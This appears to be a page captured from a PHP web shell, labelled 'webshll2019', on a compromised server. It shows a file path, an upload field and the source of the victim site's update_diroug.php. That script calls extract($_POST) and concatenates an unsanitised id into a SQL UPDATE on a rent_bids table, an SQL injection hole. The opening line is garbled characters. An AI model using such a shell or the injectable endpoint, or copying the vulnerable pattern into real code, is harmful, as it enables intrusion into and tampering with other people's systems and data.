?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/leumi/site/
Upload File :
Current File : /home/webyoo/www/leumi/site/update_diroug.php

<?php
include "start.php";
extract($_POST);
//print_r($_POST);
$myinsert = "UPDATE rent_bids SET `diroug` = ".(int)$diroug." WHERE id = ".$id;
$sql = mysqli_query($link,$myinsert);
mysqli_free_result($sql);
echo "ok";
?>



web shell, Coded By 2019